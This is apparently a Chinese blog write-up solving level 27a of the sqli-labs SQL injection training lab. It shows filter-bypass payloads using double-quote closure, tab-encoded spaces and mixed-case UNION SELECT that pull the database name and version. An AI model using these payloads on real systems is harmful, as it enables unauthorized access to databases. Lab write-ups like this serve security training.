sqllab第二十七A关通关笔记

I_WORM2024-03-20 20:00

知识点:

  • 双引号闭合
  • union select 大小写绕过
    • Union Select
  • 这里不能进行错误注入,无回显

经过测试发现这是一个双引号闭合

构造payload:id=1"%09and%091="1

页面成功回显

构造payload:id=0"%09uNion%09SElect%091,2,3%09"1

页面成功回显除了输入内容

获取数据库名和版本信息

构造payload:id=0"%09uNion%09SElect%091,database(),version()%09"1

成功获取了数据库名和版本信息

10

相关推荐
老王熬夜敲代码23 分钟前
linux系统IO
linux·笔记
stars-he24 分钟前
FPGA学习笔记(6)逻辑设计小结与以太网发送前置
笔记·学习·fpga开发
锦瑟弦音35 分钟前
跑酷游戏开发笔记3 && 游戏开始场景 cocos 3.8.7
javascript·笔记·游戏
受之以蒙37 分钟前
智能目标检测:用 Rust + dora-rs + yolo 构建“机器之眼”
人工智能·笔记·rust
EniacCheng43 分钟前
【RUST】学习笔记-环境搭建
笔记·学习·rust
d111111111d1 小时前
STM32编码电机闭环PID调节教程。
笔记·stm32·单片机·嵌入式硬件·学习·面试
其美杰布-富贵-李1 小时前
TSTabFusionTransformer 深度学习学习笔记
笔记·深度学习·学习
蒙奇D索大1 小时前
【数据结构】考研408 | 开放定址法精讲:连续探测的艺术与代价
数据结构·笔记·考研·改行学it
深蓝海拓1 小时前
PySide6从0开始学习的笔记(八) 控件(Widget)之QSlider(滑动条)
笔记·python·qt·学习·pyqt
TL滕1 小时前
从0开始学算法——第十九天(并查集练习)
笔记·学习·算法
热门推荐
01GitHub 镜像站点02UV安装并设置国内源03Linux下V2Ray安装配置指南04在VSCode配置Java开发环境的保姆级教程(适配各类AI编程IDE)05BongoCat - 跨平台键盘猫动画工具06【AutoGLM部署】本地私有化部署AI手机Agent07安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)08Neo4j(一) - Neo4j安装教程(Windows)09Cursor 又偷偷更新,这个功能太实用:Visual Editor for Cursor Browser10Open-AutoGLM Windows 安装部署教程